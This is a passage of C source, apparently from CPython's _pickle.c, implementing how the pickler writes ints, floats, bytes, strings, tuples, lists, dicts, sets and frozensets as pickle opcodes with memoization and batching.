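with the BININT* opcodes (or as a text INT line when not in binary mode);
larger values use LONG1/LONG4 with a little-endian, signed byte string
under protocol 2+, or the LONG text opcode otherwise. */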
static int
save_long(PicklerObject *self, PyObject *obj)
{
PyObject *repr = NULL;
Py_ssize_t size;
long val;
int overflow;
int status = 0;
val= PyLong_AsLongAndOverflow(obj, &overflow);
if (!overflow && (sizeof(long) <= 4 ||
(val <= 0x7fffffffL && val >= (-0x7fffffffL - 1))))
{
/* result fits in a signed 4-byte integer.
Note: we can't use -0x80000000L in the above condition because some
compilers (e.g., MSVC) will promote 0x80000000L to an unsigned type
before applying the unary minus when sizeof(long) <= 4. The
resulting value stays unsigned which is commonly not what we want,
so MSVC happily warns us about it. However, that result would have
been fine because we guard for sizeof(long) <= 4 which turns the
condition true in that particular case. */
char pdata[32];
Py_ssize_t len = 0;
if (self->bin) {
pdata[1] = (unsigned char)(val & 0xff);
pdata[2] = (unsigned char)((val >> 8) & 0xff);
pdata[3] = (unsigned char)((val >> 16) & 0xff);
pdata[4] = (unsigned char)((val >> 24) & 0xff);
if ((pdata[4] != 0) || (pdata[3] != 0)) {
pdata[0] = BININT;
len = 5;
}
else if (pdata[2] != 0) {
pdata[0] = BININT2;
len = 3;
}
else {
pdata[0] = BININT1;
len = 2;
}
}
else {
sprintf(pdata, "%c%ld\n", INT, val);
len = strlen(pdata);
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
assert(!PyErr_Occurred());
if (self->proto >= 2) {
/* Linear-time pickling. */
size_t nbits;
size_t nbytes;
unsigned char *pdata;
char header[5];
int i;
int sign = _PyLong_Sign(obj);
if (sign == 0) {
header[0] = LONG1;
header[1] = 0; /* It's 0 -- an empty bytestring. */
if (_Pickler_Write(self, header, 2) < 0)
goto error;
return 0;
}
nbits = _PyLong_NumBits(obj);
if (nbits == (size_t)-1 && PyErr_Occurred())
goto error;
/* How many bytes do we need? There are nbits >> 3 full
* bytes of data, and nbits & 7 leftover bits. If there
* are any leftover bits, then we clearly need another
* byte. What's not so obvious is that we *probably*
* need another byte even if there aren't any leftovers:
* the most-significant bit of the most-significant byte
* acts like a sign bit, and it's usually got a sense
* opposite of the one we need. The exception is ints
* of the form -(2**(8*j-1)) for j > 0. Such an int is
* its own 256's-complement, so has the right sign bit
* even without the extra byte. That's a pain to check
* for in advance, though, so we always grab an extra
* byte at the start, and cut it back later if possible.
*/
nbytes = (nbits >> 3) + 1;
if (nbytes > 0x7fffffffL) {
PyErr_SetString(PyExc_OverflowError,
"int too large to pickle");
goto error;
}
repr = PyBytes_FromStringAndSize(NULL, (Py_ssize_t)nbytes);
if (repr == NULL)
goto error;
pdata = (unsigned char *)PyBytes_AS_STRING(repr);
i = _PyLong_AsByteArray((PyLongObject *)obj,
pdata, nbytes,
1 /* little endian */ , 1 /* signed */ );
if (i < 0)
goto error;
/* If the int is negative, this may be a byte more than
* needed. This is so iff the MSB is all redundant sign
* bits.
*/
if (sign < 0 &&
nbytes > 1 &&
pdata[nbytes - 1] == 0xff &&
(pdata[nbytes - 2] & 0x80) != 0) {
nbytes--;
}
if (nbytes < 256) {
header[0] = LONG1;
header[1] = (unsigned char)nbytes;
size = 2;
}
else {
header[0] = LONG4;
size = (Py_ssize_t) nbytes;
for (i = 1; i < 5; i++) {
header[i] = (unsigned char)(size & 0xff);
size >>= 8;
}
size = 5;
}
if (_Pickler_Write(self, header, size) < 0 ||
_Pickler_Write(self, (char *)pdata, (int)nbytes) < 0)
goto error;
}
else {
const char long_op = LONG;
const char *string;
/* proto < 2: write the repr and newline. This is quadratic-time (in
the number of digits), in both directions. We add a trailing 'L'
to the repr, for compatibility with Python 2.x. */
repr = PyObject_Repr(obj);
if (repr == NULL)
goto error;
string = PyUnicode_AsUTF8AndSize(repr, &size);
if (string == NULL)
goto error;
if (_Pickler_Write(self, &long_op, 1) < 0 ||
_Pickler_Write(self, string, size) < 0 ||
_Pickler_Write(self, "L\n", 2) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(repr);
return status;
}
static int
save_float(PicklerObject *self, PyObject *obj)
{
double x = PyFloat_AS_DOUBLE((PyFloatObject *)obj);
if (self->bin) {
char pdata[9];
pdata[0] = BINFLOAT;
if (_PyFloat_Pack8(x, (unsigned char *)&pdata[1], 0) < 0)
return -1;
if (_Pickler_Write(self, pdata, 9) < 0)
return -1;
}
else {
int result = -1;
char *buf = NULL;
char op = FLOAT;
if (_Pickler_Write(self, &op, 1) < 0)
goto done;
buf = PyOS_double_to_string(x, 'r', 0, Py_DTSF_ADD_DOT_0, NULL);
if (!buf) {
PyErr_NoMemory();
goto done;
}
if (_Pickler_Write(self, buf, strlen(buf)) < 0)
goto done;
if (_Pickler_Write(self, "\n", 1) < 0)
goto done;
result = 0;
done:
PyMem_Free(buf);
return result;
}
return 0;
}
/* Perform direct write of the header and payload of the binary object.
The large contiguous data is written directly into the underlying file
object, bypassing the output_buffer of the Pickler. We intentionally
do not insert a protocol 4 frame opcode to make it possible to optimize
file.read calls in the loader.
*/
static int
_Pickler_write_bytes(PicklerObject *self,
const char *header, Py_ssize_t header_size,
const char *data, Py_ssize_t data_size,
PyObject *payload)
{
int bypass_buffer = (data_size >= FRAME_SIZE_TARGET);
int framing = self->framing;
if (bypass_buffer) {
assert(self->output_buffer != NULL);
/* Commit the previous frame. */
if (_Pickler_CommitFrame(self)) {
return -1;
}
/* Disable framing temporarily */
self->framing = 0;
}
if (_Pickler_Write(self, header, header_size) < 0) {
return -1;
}
if (bypass_buffer && self->write != NULL) {
/* Bypass the in-memory buffer to directly stream large data
into the underlying file object. */
PyObject *result, *mem = NULL;
/* Dump the output buffer to the file. */
if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
/* Stream write the payload into the file without going through the
output buffer. */
if (payload == NULL) {
/* TODO: It would be better to use a memoryview with a linked
original string if this is possible. */
payload = mem = PyBytes_FromStringAndSize(data, data_size);
if (payload == NULL) {
return -1;
}
}
result = PyObject_CallFunctionObjArgs(self->write, payload, NULL);
Py_XDECREF(mem);
if (result == NULL) {
return -1;
}
Py_DECREF(result);
/* Reinitialize the buffer for subsequent calls to _Pickler_Write. */
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
else {
if (_Pickler_Write(self, data, data_size) < 0) {
return -1;
}
}
/* Re-enable framing for subsequent calls to _Pickler_Write. */
self->framing = framing;
return 0;
}
static int
save_bytes(PicklerObject *self, PyObject *obj)
{
if (self->proto < 3) {
/* Older pickle protocols do not have an opcode for pickling bytes
objects. Therefore, we need to fake the copy protocol (i.e.,
the __reduce__ method) to permit bytes object unpickling.
Here we use a hack to be compatible with Python 2. Since in Python
2 'bytes' is just an alias for 'str' (which has different
parameters than the actual bytes object), we use codecs.encode
to create the appropriate 'str' object when unpickled using
Python 2 *and* the appropriate 'bytes' object when unpickled
using Python 3. Again this is a hack and we don't need to do this
with newer protocols. */
PyObject *reduce_value = NULL;
int status;
if (PyBytes_GET_SIZE(obj) == 0) {
reduce_value = Py_BuildValue("(O())", (PyObject*)&PyBytes_Type);
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyObject *unicode_str =
PyUnicode_DecodeLatin1(PyBytes_AS_STRING(obj),
PyBytes_GET_SIZE(obj),
"strict");
_Py_IDENTIFIER(latin1);
if (unicode_str == NULL)
return -1;
reduce_value = Py_BuildValue("(O(OO))",
st->codecs_encode, unicode_str,
_PyUnicode_FromId(&PyId_latin1));
Py_DECREF(unicode_str);
}
if (reduce_value == NULL)
return -1;
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
else {
Py_ssize_t size;
char header[9];
Py_ssize_t len;
size = PyBytes_GET_SIZE(obj);
if (size < 0)
return -1;
if (size <= 0xff) {
header[0] = SHORT_BINBYTES;
header[1] = (unsigned char)size;
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINBYTES;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINBYTES8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a bytes object larger than 4 GiB");
return -1; /* string too large */
}
if (_Pickler_write_bytes(self, header, len,
PyBytes_AS_STRING(obj), size, obj) < 0)
{
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
}
/* A copy of PyUnicode_EncodeRawUnicodeEscape() that also translates
backslash and newline characters to \uXXXX escapes. */
static PyObject *
raw_unicode_escape(PyObject *obj)
{
char *p;
Py_ssize_t i, size;
void *data;
unsigned int kind;
_PyBytesWriter writer;
if (PyUnicode_READY(obj))
return NULL;
_PyBytesWriter_Init(&writer);
size = PyUnicode_GET_LENGTH(obj);
data = PyUnicode_DATA(obj);
kind = PyUnicode_KIND(obj);
p = _PyBytesWriter_Alloc(&writer, size);
if (p == NULL)
goto error;
writer.overallocate = 1;
for (i=0; i < size; i++) {
Py_UCS4 ch = PyUnicode_READ(kind, data, i);
/* Map 32-bit characters to '\Uxxxxxxxx' */
if (ch >= 0x10000) {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 10-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'U';
*p++ = Py_hexdigits[(ch >> 28) & 0xf];
*p++ = Py_hexdigits[(ch >> 24) & 0xf];
*p++ = Py_hexdigits[(ch >> 20) & 0xf];
*p++ = Py_hexdigits[(ch >> 16) & 0xf];
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Map 16-bit characters, '\\' and '\n' to '\uxxxx' */
else if (ch >= 256 || ch == '\\' || ch == '\n') {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 6-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'u';
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Copy everything else as-is */
else
*p++ = (char) ch;
}
return _PyBytesWriter_Finish(&writer, p);
error:
_PyBytesWriter_Dealloc(&writer);
return NULL;
}
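/* Write a str object using the binary opcodes. The string is encoded as
UTF-8 (falling back to the "surrogatepass" error handler for lone
surrogates) and framed with SHORT_BINUNICODE, BINUNICODE or BINUNICODE8
depending on its size and the protocol in use. */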
static int
write_unicode_binary(PicklerObject *self, PyObject *obj)
{
char header[9];
Py_ssize_t len;
PyObject *encoded = NULL;
Py_ssize_t size;
const char *data;
if (PyUnicode_READY(obj))
return -1;
data = PyUnicode_AsUTF8AndSize(obj, &size);
if (data == NULL) {
/* Issue #8383: for strings with lone surrogates, fallback on the
"surrogatepass" error handler. */
PyErr_Clear();
encoded = PyUnicode_AsEncodedString(obj, "utf-8", "surrogatepass");
if (encoded == NULL)
return -1;
data = PyBytes_AS_STRING(encoded);
size = PyBytes_GET_SIZE(encoded);
}
assert(size >= 0);
if (size <= 0xff && self->proto >= 4) {
header[0] = SHORT_BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINUNICODE8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a string larger than 4GiB");
Py_XDECREF(encoded);
return -1;
}
if (_Pickler_write_bytes(self, header, len, data, size, encoded) < 0) {
Py_XDECREF(encoded);
return -1;
}
Py_XDECREF(encoded);
return 0;
}
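/* Pickle a str object: dispatch to write_unicode_binary() for binary
protocols, or emit a raw-unicode-escaped line for protocol 0. */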
static int
save_unicode(PicklerObject *self, PyObject *obj)
{
if (self->bin) {
if (write_unicode_binary(self, obj) < 0)
return -1;
}
else {
PyObject *encoded;
Py_ssize_t size;
const char unicode_op = UNICODE;
encoded = raw_unicode_escape(obj);
if (encoded == NULL)
return -1;
if (_Pickler_Write(self, &unicode_op, 1) < 0) {
Py_DECREF(encoded);
return -1;
}
size = PyBytes_GET_SIZE(encoded);
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded), size) < 0) {
Py_DECREF(encoded);
return -1;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* A helper for save_tuple. Push the len elements in tuple t on the stack. */
static int
store_tuple_elements(PicklerObject *self, PyObject *t, Py_ssize_t len)
{
Py_ssize_t i;
assert(PyTuple_Size(t) == len);
for (i = 0; i < len; i++) {
PyObject *element = PyTuple_GET_ITEM(t, i);
if (element == NULL)
return -1;
if (save(self, element, 0) < 0)
return -1;
}
return 0;
}
/* Tuples are ubiquitous in the pickle protocols, so many techniques are
* used across protocols to minimize the space needed to pickle them.
* Tuples are also the only builtin immutable type that can be recursive
* (a tuple can be reached from itself), and that requires some subtle
* magic so that it works in all cases. IOW, this is a long routine.
*/
static int
save_tuple(PicklerObject *self, PyObject *obj)
{
Py_ssize_t len, i;
const char mark_op = MARK;
const char tuple_op = TUPLE;
const char pop_op = POP;
const char pop_mark_op = POP_MARK;
const char len2opcode[] = {EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3};
if ((len = PyTuple_Size(obj)) < 0)
return -1;
if (len == 0) {
char pdata[2];
if (self->proto) {
pdata[0] = EMPTY_TUPLE;
len = 1;
}
else {
pdata[0] = MARK;
pdata[1] = TUPLE;
len = 2;
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
/* The tuple isn't in the memo now. If it shows up there after
* saving the tuple elements, the tuple must be recursive, in
* which case we'll pop everything we put on the stack, and fetch
* its value from the memo.
*/
if (len <= 3 && self->proto >= 2) {
/* Use TUPLE{1,2,3} opcodes. */
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the len elements */
for (i = 0; i < len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, len2opcode + len, 1) < 0)
return -1;
}
goto memoize;
}
/* proto < 2 and len > 0, or proto >= 2 and len > 3.
* Generate MARK e1 e2 ... TUPLE
*/
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the stack stuff we pushed */
if (self->bin) {
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
}
else {
/* Note that we pop one more than len, to remove
* the MARK too.
*/
for (i = 0; i <= len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
}
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, &tuple_op, 1) < 0)
return -1;
}
memoize:
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* iter is an iterator giving items, and we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, <0 on error.
*/
static int
batch_list(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char append_op = APPEND;
const char appends_op = APPENDS;
assert(iter != NULL);
/* XXX: I think this function could be made faster by avoiding the
iterator interface and fetching objects directly from the list using
PyList_GET_ITEM.
*/
if (self->proto == 0) {
/* APPENDS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
i = save(self, obj, 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, firstitem, 0) < 0)
goto error;
if (_Pickler_Write(self, &append_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, APPENDS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, firstitem, 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (save(self, obj, 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_list() above, specialized for lists (with no
* support for list subclasses). Like batch_list(), we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, -1 on error.
*
* This version is considerably faster than batch_list(), if less general.
*
* Note that this only works for protocols > 0.
*/
static int
batch_list_exact(PicklerObject *self, PyObject *obj)
{
PyObject *item = NULL;
Py_ssize_t this_batch, total;
const char append_op = APPEND;
const char appends_op = APPENDS;
const char mark_op = MARK;
assert(obj != NULL);
assert(self->proto > 0);
assert(PyList_CheckExact(obj));
if (PyList_GET_SIZE(obj) == 1) {
item = PyList_GET_ITEM(obj, 0);
if (save(self, item, 0) < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
total = 0;
do {
this_batch = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (total < PyList_GET_SIZE(obj)) {
item = PyList_GET_ITEM(obj, total);
if (save(self, item, 0) < 0)
return -1;
total++;
if (++this_batch == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
return -1;
} while (total < PyList_GET_SIZE(obj));
return 0;
}
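/* Pickle a list: emit EMPTY_LIST (or MARK LIST for protocol 0), memoize the
still-empty list so that self-referential lists resolve through the memo,
then append the elements in batches via batch_list_exact() or
batch_list(). */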
static int
save_list(PicklerObject *self, PyObject *obj)
{
char header[3];
Py_ssize_t len;
int status = 0;
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty list. */
if (self->bin) {
header[0] = EMPTY_LIST;
len = 1;
}
else {
header[0] = MARK;
header[1] = LIST;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
/* Get list length, and bow out early if empty. */
if ((len = PyList_Size(obj)) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (len != 0) {
/* Materialize the list elements. */
if (PyList_CheckExact(obj) && self->proto > 0) {
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_list_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
PyObject *iter = PyObject_GetIter(obj);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_list(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
/* iter is an iterator giving (key, value) pairs, and we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, <0 on error.
*
* This is very much like batch_list(). The difference between saving
* elements directly, and picking apart two-tuples, is so long-winded at
* the C level, though, that attempts to combine these routines were too
* ugly to bear.
*/
static int
batch_dict(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(iter != NULL);
if (self->proto == 0) {
/* SETITEMS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
return -1;
}
i = save(self, PyTuple_GET_ITEM(obj, 0), 0);
if (i >= 0)
i = save(self, PyTuple_GET_ITEM(obj, 1), 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
if (!PyTuple_Check(firstitem) || PyTuple_Size(firstitem) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, SETITEMS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
if (save(self, PyTuple_GET_ITEM(obj, 0), 0) < 0 ||
save(self, PyTuple_GET_ITEM(obj, 1), 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_dict() above that specializes for dicts, with no
* support for dict subclasses. Like batch_dict(), we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, -1 on error.
*
* Note that this currently doesn't work for protocol 0.
*/
static int
batch_dict_exact(PicklerObject *self, PyObject *obj)
{
PyObject *key = NULL, *value = NULL;
int i;
Py_ssize_t dict_size, ppos = 0;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(obj != NULL && PyDict_CheckExact(obj));
assert(self->proto > 0);
dict_size = PyDict_GET_SIZE(obj);
/* Special-case len(d) == 1 to save space. */
if (dict_size == 1) {
PyDict_Next(obj, &ppos, &key, &value);
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (PyDict_Next(obj, &ppos, &key, &value)) {
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
return -1;
if (PyDict_GET_SIZE(obj) != dict_size) {
PyErr_Format(
PyExc_RuntimeError,
"dictionary changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
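/* Pickle a dict, mirroring save_list(): write EMPTY_DICT (or MARK DICT),
memoize the empty dict first so that recursive dicts resolve through the
memo, then fill it with SETITEM/SETITEMS batches. */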
static int
save_dict(PicklerObject *self, PyObject *obj)
{
PyObject *items, *iter;
char header[3];
Py_ssize_t len;
int status = 0;
assert(PyDict_Check(obj));
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty dict. */
if (self->bin) {
header[0] = EMPTY_DICT;
len = 1;
}
else {
header[0] = MARK;
header[1] = DICT;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (PyDict_GET_SIZE(obj)) {
/* Save the dict items. */
if (PyDict_CheckExact(obj) && self->proto > 0) {
/* We can take certain shortcuts if we know this is a dict and
not a dict subclass. */
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_dict_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
_Py_IDENTIFIER(items);
items = _PyObject_CallMethodId(obj, &PyId_items, NULL);
if (items == NULL)
goto error;
iter = PyObject_GetIter(items);
Py_DECREF(items);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_dict(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
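/* Pickle a set. Protocols older than 4 have no native set opcodes, so the
set is reduced to a "set(list_of_items)" call; protocol 4 and newer use
EMPTY_SET followed by batched ADDITEMS. */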
static int
save_set(PicklerObject *self, PyObject *obj)
{
PyObject *item;
int i;
Py_ssize_t set_size, ppos = 0;
Py_hash_t hash;
const char empty_set_op = EMPTY_SET;
const char mark_op = MARK;
const char additems_op = ADDITEMS;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PySet_Type, items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &empty_set_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
set_size = PySet_GET_SIZE(obj);
if (set_size == 0)
return 0; /* nothing to do */
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (_PySet_NextEntry(obj, &ppos, &item, &hash)) {
if (save(self, item, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &additems_op, 1) < 0)
return -1;
if (PySet_GET_SIZE(obj) != set_size) {
PyErr_Format(
PyExc_RuntimeError,
"set changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
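/* Pickle a frozenset. As in save_set(), protocols below 4 fall back to a
reduce tuple; protocol 4 pushes the elements between MARK and FROZENSET,
handling recursive frozensets through the memo. */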
static int
save_frozenset(PicklerObject *self, PyObject *obj)
{
PyObject *iter;
const char mark_op = MARK;
const char frozenset_op = FROZENSET;
if (self->fast && !fast_save_enter(self, obj))
return -1;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PyFrozenSet_Type,
items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
iter = PyObject_GetIter(obj);
if (iter == NULL) {
return -1;
}
for (;;) {
PyObject *item;
item = PyIter_Next(iter);
if (item == NULL) {
if (PyErr_Occurred()) {
Py_DECREF(iter);
return -1;
}
break;
}
if (save(self, item, 0) < 0) {
Py_DECREF(item);
Py_DECREF(iter);
return -1;
}
Py_DECREF(item);
}
Py_DECREF(iter);
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_mark_op = POP_MARK;
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
if (_Pickler_Write(self, &frozenset_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
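/* For protocols < 3 with fix_imports enabled, translate a (module, global)
name pair from its Python 3 spelling to the corresponding Python 2 one,
using the reverse mappings kept in _compat_pickle. */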
static int
fix_imports(PyObject **module_name, PyObject **global_name)
{
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
key = PyTuple_Pack(2, *module_name, *global_name);
if (key == NULL)
return -1;
item = PyDict_GetItemWithError(st->name_mapping_3to2, key);
Py_DECREF(key);
if (item) {
PyObject *fixed_module_name;
PyObject *fixed_global_name;
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
